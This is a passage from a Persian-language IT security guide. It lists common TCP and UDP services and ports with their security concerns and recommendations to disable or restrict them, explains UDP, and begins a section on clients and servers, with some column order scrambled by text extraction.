‫ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ‬ ‫ﺏ‪ ،‬ﺩ‬ ‫ﭘﺮﻭﺗﻜﻞ ﺍﻧﺘﻘﺎﻝ ﺧﺒﺮﻫﺎﻱ ﺷﺒﻜﻪ )‪(Usenet‬‬ ‫‪nntp‬‬ ‫‪١١٩‬‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﺘﻦﺳﺎﺩﻩ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‪ ،‬ﻳﺎ‬
‫ﺏ‬ ‫ﭘﺮﻭﺗﻜﻞ ﺩﺳﺘﺮﺳﻲ ﺗﻌﺎﻣﻠﻲ ﺑﻪ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬ ‫‪Imap‬‬ ‫‪١٤٣‬‬
‫ﺑﺠﺎﻱ ﺁﻥ ﺍﺯ ‪ IMAP‬ﺭﻭﻱ ‪ TLS‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‬
‫‪ HTTP‬ﺭﻣﺰﺷﺪﻩ ﺑﺎ ‪SSL‬‬ ‫‪https‬‬ ‫‪٤٤٣‬‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‬ ‫ﺍﺟﺮﺍﻱ ﻓﺮﻣﺎﻥ ﺭﻭﻱ ﻳﻚ ﻣﻴﺰﺑﺎﻥ ‪ Unix‬ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‬ ‫‪exec‬‬ ‫‪٥١٢‬‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‬ ‫ﺏ‪ ،‬ﺩ‬ ‫ﻭﺭﻭﺩ ﺑﻪ ﻳﻚ ﻣﻴﺰﺑﺎﻥ ‪ Unix‬ﺭﺍﻩ ﺩﻭﺭ )‪(rlogin‬‬ ‫‪login‬‬ ‫‪٥١٣‬‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‬ ‫ﺏ‪ ،‬ﺩ‬ ‫ﺳﺎﺧﺘﻦ ﭘﻮﺳﺘﻪ ﺩﺭ ﻣﻴﺰﺑﺎﻥ ‪ Unix‬ﺭﺍﻩ ﺩﻭﺭ )‪(rsh‬‬ ‫‪shell‬‬ ‫‪٥١٤‬‬
‫ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ‬ ‫ﺩ‬ ‫ﭼﺎﭖ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‬ ‫‪printer‬‬ ‫‪٥١٥‬‬
‫ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ‬ ‫ﺝ‬ ‫ﺧﺪﻣﺎﺕ ‪ proxy‬ﺑﺮﻧﺎﻣﻪﺍﻱ ‪SOCKS‬‬ ‫‪socks‬‬ ‫‪١٠٨٠‬‬
‫ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ‬ ‫ﺩ‬ ‫‪ NFS‬ﺭﻭﻱ ‪TCP‬‬ ‫‪NFS‬‬ ‫‪٢٠٤٩‬‬
‫ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ‪ ،‬ﺑﻮﺳﻴﻠﺔ ‪ SSH‬ﻳﻚ‬
‫ﺏ‪ ،‬ﺩ‬ ‫ﺳﻴﺴﺘﻢ ‪X-Windows‬‬ ‫‪X‬‬ ‫‪ ٦٠١٠‬ﺗﺎ ‪٦٠٠٠‬‬
‫ﺗﻮﻧﻞ ﺑﺴﺎﺯﻳﺪ‬

‫‪UDP‬‬

‫‪ UDP‬ﺳﻴﺴﺘﻤﻲ ﺳﺎﺩﻩ ﻭ ﻏﻴﺮﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﺑﺮﺍﻱ ﺍﺭﺳﺎﻝ ﺩﺍﺩﻩ ﻣﻴﺎﻥ ﺩﻭ ﻳﺎ ﭼﻨﺪ ﺑﺮﻧﺎﻣﻪ ﺭﻭﻱ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﺭﺍﻳﺎﻧﺔ ﻣﺸﺎﺑﻪ ﻳﺎ ﻣﺘﻔﺎﻭﺕ ﺍﺭﺍﺋﻪ‬
‫ﻣﻲﺩﻫﺪ‪" .‬ﻏﻴﺮﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ" ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺗﻀﻤﻴﻦ ﻧﻤﻲﻛﻨﺪ ﻫﺮ ﺑﺴﺘﺔ ﺍﺭﺳﺎﻝﺷﺪﻩ ﺣﺘﻤﹰﺎ ﺩﺭ ﻣﻘﺼﺪ ﺗﺤﻮﻳﻞ ﺩﺍﺩﻩ‬
‫ﺷﻮﺩ‪ ،‬ﻭ ﻳﺎ ﺑﺴﺘﻪﻫﺎ ﺑﻪ ﻫﻤﺎﻥ ﺗﺮﺗﻴﺒﻲ ﻛﻪ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ ﺑﻪ ﻣﻘﺼﺪ ﺑﺮﺳﻨﺪ؛ ﺍﻣﺎ ﺑﻪ ﻫﺮ ﺣﺎﻝ ‪ UDP‬ﺑﻬﺘﺮﻳﻦ ﺗﻼﺵ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺭﺳﺎﻧﺪﻥ‬
‫ﻻ ﺭﻭﻱ ﻳﻚ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﻳﺎ ﻳﻚ ﻣﺴﻴﺮ ﺧﻠﻮﺕ‪ UDP ،‬ﻧﺰﺩﻳﻚ ﺑﻪ ‪ %١٠٠‬ﺑﺴﺘﻪﻫﺎ ﺭﺍ ﺑﻪ ﻣﻘﺼﺪ‬ ‫ﺑﺴﺘﻪﻫﺎ ﺑﻪ ﻣﻘﺼﺪ ﺑﻌﻤﻞ ﻣﻲﺁﻭﺭﺩ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻲﺭﺳﺎﻧﺪ‪ .‬ﻣﺰﻳﺖ ‪ ،UDP‬ﺳﺮﺑﺎﺭ‪ ٢٩١‬ﻛﻤﺘﺮ ﺁﻥ ﻧﺴﺒﺖ ﺑﻪ ‪ TCP‬ﺍﺳﺖ ‪ -‬ﺍﻳﻦ ﺳﺮﺑﺎﺭ ﻛﻤﺘﺮ ﺑﻪ ﺧﺪﻣﺎﺕ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ UDP‬ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﻛﻪ‬

‫‪291 Overhead‬‬
‫‪٣٩٩‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺑﺘﻮﺍﻧﻨﺪ ﺗﺎ ‪ ١٠‬ﺑﺮﺍﺑﺮ ‪ TCP‬ﺩﺭ ﺍﺭﺳﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺑﻬﺮﻩﻭﺭﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ UDP .‬ﺩﺭ ﺩﺭﺟﺔ ﺍﻭﻝ ﺩﺭ ﺳﻴﺴﺘﻢ ﺍﻃﻼﻋﺎﺕ ﺷﺒﻜﺔ ‪ (NIS) SUN‬ﻭ‬
‫ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺷﺒﻜﻪ )‪ (NFS‬ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻧﻬﺎ ﻭ ﻧﻴﺰ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻣﺴﻴﺮﻳﺎﺑﻲ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺍﺯ ‪ UDP‬ﺩﺭ‬
‫ﻼ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﻛﻪ ﺩﺭ ﻣﺪﺕ ﺯﻣﺎﻥ ﻛﻮﺗﺎﻫﻲ ﻳﻚ‬ ‫ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺍﺯ ﻧﺮﺳﻴﺪﻥ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﻳﻚ ﺑﺴﺘﻪ ﺗﺄﺛﻴﺮ ﻣﻨﻔﻲ ﭼﻨﺪﺍﻧﻲ ﻧﻤﻲﭘﺬﻳﺮﻧﺪ ‪ -‬ﻣﺜ ﹰ‬
‫ﺑﺴﺘﺔ ﻣﺮﺗﺒﻂ ﺩﻳﮕﺮ ﺑﺎ ﺍﻃﻼﻋﺎﺕ ﻣﺸﺎﺑﻪ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻨﺪ ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﺍﻫﻤﻴﺖ ﭼﻨﺪﺍﻧﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺖ ‪ -‬ﻧﻴﺰ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ‪.‬‬
‫ﻫﻤﺎﻧﻨﺪ ‪ ،TCP‬ﺑﺴﺘﻪﻫﺎﻱ ‪ UDP‬ﻧﻴﺰ ﺍﺯ ﻳﻚ ﭘﻮﺭﺕ ﺩﺭ ﻣﻴﺰﺑﺎﻥ ﻓﺮﺳﺘﻨﺪﻩ ﺑﻪ ﻳﻚ ﭘﻮﺭﺕ ﺩﺭ ﻣﻴﺰﺑﺎﻥ ﮔﻴﺮﻧﺪﻩ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻫﺮ ﺑﺴﺘﺔ‬
‫‪ UDP‬ﻫﻤﭽﻨﻴﻦ ﻣﺤﺘﻮﻱ ﺩﺍﺩﻩﻫﺎﻱ ﻛﺎﺭﺑﺮ ﻧﻴﺰ ﻫﺴﺖ‪ .‬ﺍﮔﺮ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺭﻭﻱ ﺁﻥ ﭘﻮﺭﺕ ﺧﺎﺹ ﺑﻪ ﺍﻧﺘﻈﺎﺭ ﺍﻳﺴﺘﺎﺩﻩ ﻭ ﺁﻣﺎﺩﺓ ﺩﺭﻳﺎﻓﺖ ﺑﺴﺘﻪ ﺑﺎﺷﺪ‪،‬‬
‫ﺑﺴﺘﻪ ﺩﺭﻳﺎﻓﺖ ﺧﻮﺍﻫﺪ ﺷﺪ‪ .‬ﺍﮔﺮ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺭﻭﻱ ﺁﻥ ﭘﻮﺭﺕ ﻣﻨﺘﻈﺮ ﺑﺴﺘﻪ ﻧﺒﺎﺷﺪ‪ ،‬ﺑﻪ ﺑﺴﺘﻪ ﺗﻮﺟﻬﻲ ﻧﻤﻲﺷﻮﺩ ﻭ ﻣﻴﺰﺑﺎﻥ ﮔﻴﺮﻧﺪﺓ ﭘﻴﺎﻡ ﻳﻚ ﭘﻴﻐﺎﻡ‬
‫ﺧﻄﺎﻱ ‪ ICMP‬ﻣﻲﻓﺮﺳﺘﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺭﻭﻱ ﺁﻥ ﭘﻮﺭﺕ ﻣﻨﺘﻈﺮ ﺩﺭﻳﺎﻓﺖ ﭘﻴﺎﻡ ﺑﺎﺷﺪ ﻭﻟﻲ ﺁﻣﺎﺩﮔﻲ ﺩﺭﻳﺎﻓﺖ ﺁﻧﺮﺍ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺑﺴﺘﻪ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻳﻚ ﺻﻒ ﺩﺭ ﻧﻮﺑﺖ ﺩﺭﻳﺎﻓﺖﺷﺪﻥ ﺑﺎﻗﻲ ﺑﻤﺎﻧﺪ ﺗﺎ ﻧﻬﺎﻳﺘﹰﺎ ﺩﺭﻳﺎﻓﺖ ﺷﻮﺩ ﻭ ﻳﺎ ﺍﺯ ﺩﺳﺖ ﺑﺮﻭﺩ‪.‬‬
‫ﺑﺮﺧﻼﻑ ﺑﺴﺘﻪﻫﺎﻱ ‪ ،TCP‬ﻳﻚ ﺑﺴﺘﺔ ‪ UDP‬ﻣﻲﺗﻮﺍﻧﺪ ﺭﻭﻱ ﺷﺒﮑﻪﻫﺎﻱ ﻋﺎﻡﮔﺴﺘﺮ ﭘﺨﺶ ﻋﻤﻮﻣﻲ ﺷﻮﺩ‪ ،‬ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ‬
‫ﻳﻚ ﭘﻮﺭﺕ ﺧﺎﺹ ﺭﻭﻱ ﻫﻤﺔ ﻣﻴﺰﺑﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺭﻭﻱ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﻳﻜﺴﺎﻧﻲ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﺍﺭﺳﺎﻝ ﮔﺮﺩﺩ‪ .‬ﺑﺴﺘﻪﻫﺎﻱ ﻋﺎﻡﮔﺴﺘﺮ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﺮﺍﻱ‬
‫ﺧﺪﻣﺎﺗﻲ ﻣﺜﻞ ﺍﻋﻼﻡ ﺳﺎﻋﺖ ﺭﻭﺯ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪.‬‬
‫ﭘﻮﺭﺗﻬﺎ ﺑﺎ ﺍﻋﺪﺍﺩ ‪ ١٦‬ﺑﻴﺘﻲ ﻣﺸﺨﺺ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺟﺪﻭﻝ ‪-٥‬ﺏ ﺑﺮﺧﻲ ﭘﻮﺭﺗﻬﺎﻱ ﻣﻨﺘﺴﺐ ﺑﻪ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺧﺪﻣﺎﺕ ﻣﻌﻤﻮﻝ ‪ UDP‬ﺭﺍ ﻧﺸﺎﻥ‬
‫ﻣﻲﺩﻫﺪ‪ .‬ﺩﺭ ﺧﺪﻣﺎﺕ ‪ UDP‬ﻧﻴﺰ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻭ ﺿﻌﻔﻬﺎﻱ ﻗﺎﺑﻞ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﺸﺎﺑﻪ ﺟﺪﻭﻝ ﻗﺒﻠﻲ‪ ،‬ﻧﻮﻉ ﻣﺨﺎﻃﺮﺓ ﻫﺮﻳﻚ‬
‫ﺍﺯ ﺁﻧﻬﺎ ﺩﺭ ﻣﻘﺎﺑﻠﺸﺎﻥ ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺩﺳﺘﻪﺑﻨﺪﻱ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﺪﻣﺎﺕ ‪ UDP‬ﺑﻌﺒﺎﺭﺕ ﺯﻳﺮ ﺍﺳﺖ‪:‬‬
‫ﺍﻟﻒ‪ .‬ﻣﻲﺗﻮﺍﻥ ﺳﺮﻭﻳﺲ ﺭﺍ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺩ ﻭ ﺣﻤﻠﺔ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺭﺍ ﺁﻏﺎﺯ ﮐﺮﺩ؛‬
‫ﺏ‪ .‬ﭘﺮﻭﺗﻜﻞ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﺼﻮﺭﺕ ﻣﺘﻦﺳﺎﺩﻩ ﻭ ﺑﺪﻭﻥ ﻫﻴﭽﮕﻮﻧﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻨﺘﻘﻞ ﺷﻮﺩ؛ ﻭ‬
‫ﻻ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺪﻩ ﻛﻪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺯ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ ،‬ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺩﺭ ﻣﻌﺮﺽ ﺗﻬﺪﻳﺪ‬ ‫ﺝ‪ .‬ﺳﺮﻭﻳﺲ ﻣﻌﻤﻮ ﹰ‬
‫ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﻭ ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﻣﺸﺎﺑﻪ ﺣﻤﻼﺕ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٠٠‬‬

‫ﺩ‪ .‬ﺟﺪﻭﻝ ‪-٥‬ﺏ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﺧﺪﻣﺎﺕ ﻭ ﭘﻮﺭﺗﻬﺎﻱ ﻣﻌﻤﻮﻝ ‪UDP‬‬

‫ﭘﻴﺸﻨﻬﺎﺩ ﻭﺿﻌﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ‬ ‫ﻧﮕﺮﺍﻧﻴﻬﺎ‬ ‫ﻋﻤﻠﻜﺮﺩ‬ ‫ﻧﺎﻡ ﺳﺮﻭﻳﺲ‬ ‫ﭘﻮﺭﺕ ‪TCP‬‬


‫ﺩﺍﺩﻩﻫﺎﻱ ﻛﺎﺭﺑﺮ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ‪datagram‬‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‬ ‫ﺍﻟﻒ‬ ‫‪echo‬‬ ‫‪٧‬‬
‫ﺩﻳﮕﺮ ﺑﺎﺯﻣﻲﮔﺮﺩﺍﻧﺪ‬
‫ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﻧﻤﻲﺩﻫﺪ‬ ‫‪discard‬‬ ‫‪٩‬‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‬ ‫ﺍﻟﻒ‬ ‫ﺳﺎﻋﺎﺕ ﺭﻭﺯ ﺭﺍ ﺑﺮﻣﻲﮔﺮﺩﺍﻧﺪ‬ ‫‪daytime‬‬ ‫‪١٣‬‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‬ ‫ﺍﻟﻒ‬ ‫ﻣﻮﻟﺪ ﻛﺎﺭﺍﻛﺘﺮ‬ ‫‪charger‬‬ ‫‪١٩‬‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‬ ‫ﺍﻟﻒ‬ ‫ﺳﺎﻋﺖ ﺭﻭﺯ ﺭﺍ ﺑﺮﻣﻲﮔﺮﺩﺍﻧﺪ‬ ‫‪time‬‬ ‫‪٣٧‬‬
‫ﺟﺰ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻋﻤﻮﻣﻲ ﻧﺎﻡ‬
‫ﺝ‬ ‫ﺳﺮﻭﻳﺲ ﻧﺎﻡ ﺩﺍﻣﻨﻪ )‪(DNS‬‬ ‫‪domain‬‬ ‫‪٥٣‬‬
‫ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ‬
‫‪bootpc‬‬
‫ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ‬ ‫ﭘﺮﻭﺗﻜﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ ﭘﻮﻳﺎﻱ ﻣﻴﺰﺑﺎﻥ )‪(DHCP‬‬ ‫‪ ٦٧‬ﻭ ‪٦٨‬‬
‫‪bootps‬‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‬ ‫ﺝ‬ ‫ﭘﺮﻭﺗﻜﻞ ﺍﻧﺘﻘﺎﻝ ﺟﺰﺋﻲ ﻓﺎﻳﻞ )‪(TFTP‬‬ ‫‪tftp‬‬ ‫‪٦٩‬‬
‫ﻧﮕﺎﺷﺘﮕﺮ ﭘﻮﺭﺕ ﺩﺭ ﻓﺮﺍﺧﻮﺍﻧﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ )‪(RPC‬‬
‫ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ‬ ‫ﺝ‬ ‫‪sunrpc‬‬ ‫‪١١١‬‬
‫ﺷﺮﻛﺖ ‪Sun‬‬
‫‪،١٣٩ ،١٣٧‬‬
‫ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ‬ ‫ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻭ ﺷﺒﻜﻪﺳﺎﺯﻱ ﺷﺮﻛﺖ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ‬ ‫‪Smb‬‬
‫‪٤٤٥‬‬
‫ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ‬ ‫ﭘﺮﻭﺗﻜﻞ ﺯﻣﺎﻥ ﺷﺒﻜﻪ )‪(NTP‬‬ ‫‪ntp‬‬ ‫‪١٢٣‬‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‪ ،‬ﻳﺎ ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ‬ ‫ﺏ‪ ،‬ﺝ‬ ‫ﭘﺮﻭﺗﻜﻞ ﻣﺪﻳﺮﻳﺖ ﺳﺎﺩﺓ ﺷﺒﻜﻪ )‪(SNMP‬‬ ‫‪snmp‬‬ ‫‪١٦١‬‬
‫ﺟﻤﻊﺁﻭﺭﻱ ﭘﻴﺎﻣﻬﺎﻱ ﭘﺨﺸﻲ ﻋﻤﻮﻣﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻨﻜﻪ‬
‫‪who‬‬ ‫‪٥١٣‬‬
‫ﭼﻪ ﻛﺴﻲ ﺑﻪ ﺳﺎﻳﺮ ﻣﺎﺷﻴﻨﻬﺎﻱ ﺯﻳﺮﺷﺒﻜﻪ ﻭﺍﺭﺩ ﺷﺪﻩ‬
‫ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ‬ ‫ﺍﻟﻒ‬ ‫ﻗﺎﺑﻠﻴﺖ ﺛﺒﺖ ﺳﻴﺴﺘﻤﻲ‬ ‫‪syslog‬‬ ‫‪٥١٤‬‬
‫ﺍﻳﺠﺎﺩ ﺩﺭﺧﻮﺍﺳﺖ ﺻﺤﺒﺖ‬ ‫‪talk‬‬ ‫‪٥١٧‬‬
‫ﺩﺭﺧﻮﺍﺳﺖ ﺻﺤﺒﺖ "ﺟﺪﻳﺪ"‬ ‫‪ntalk‬‬ ‫‪٥١٨‬‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ )ﻣﺴﻴﺮﻳﺎﺑﻲ ﺍﻳﺴﺘﺎ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﻳﺪ( ﻭ‬
‫ﺝ‬ ‫ﭘﺮﻭﺗﻜﻞ ﺍﻃﻼﻋﺎﺕ ﻣﺴﻴﺮﻳﺎﺑﻲ )‪(RIP‬‬ ‫‪route‬‬ ‫‪٥٢٠‬‬
‫ﻳﺎ ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‬ ‫ﺍﻟﻒ‬ ‫ﻧﻮﺷﺘﻦ ﺩﺭ ﭘﺎﻳﺎﻧﺔ ﻫﺮ ﻛﺎﺭﺑﺮ‬ ‫‪netwall‬‬ ‫‪٥٣٣‬‬
‫ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ‬ ‫ﺝ‬ ‫ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺷﺒﻜﻪ )‪(NFS‬‬ ‫‪) NFS‬ﻣﻌﻤﻮ ﹰﻻ(‬ ‫‪٢٠٤٩‬‬
‫‪٤٠١‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ‬
‫ﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮ ﺍﺳﺎﺱ ﻣﺪﻝ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ‪ /‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺳﺖ‪ .‬ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ ﺑﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ‬
‫ﺩﻳﮕﺮﻱ ﺑﻪ ﻧﺎﻡ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺗﺼﺎﻻﺗﻲ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻧﻴﺰ ﻣﻨﺘﻈﺮ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻳﻦ ﺍﺗﺼﺎﻻﺕ‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﻳﻚ ﻧﻤﻮﻧﻪ ﺍﺯ ﻳﻚ ﺟﻔﺖ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ‪ /‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‪ ،‬ﺳﻴﺴﺘﻢ ﺯﻣﺎﻥ ﺷﺒﻜﻪ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺑﺮﻧﺎﻣﺔ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ‬
‫ﻛﻪ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺷﺒﻜﻪ‪ ،‬ﺯﻣﺎﻥ ﺭﺍ ﻣﻲﭘﺮﺳﺪ‪ .‬ﺑﺮﻧﺎﻣﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻫﻢ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﻣﻨﺘﻈﺮ ﺍﻳﻦ ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﺍﺳﺖ ﻭ ﺯﻣﺎﻥ‬
‫ﺻﺤﻴﺢ ﺭﺍ ﺍﻋﻼﻡ ﻣﻲﻛﻨﺪ‪ .‬ﺩﺭ ﺩﻧﻴﺎﻱ ‪ ،Unix‬ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﺍﻱ ﻛﻪ ﺩﺭ ﭘﺲﺯﻣﻴﻨﻪ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ ﻭ ﻣﻨﺘﻈﺮ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﻛﺎﺭﺑﺮ‬
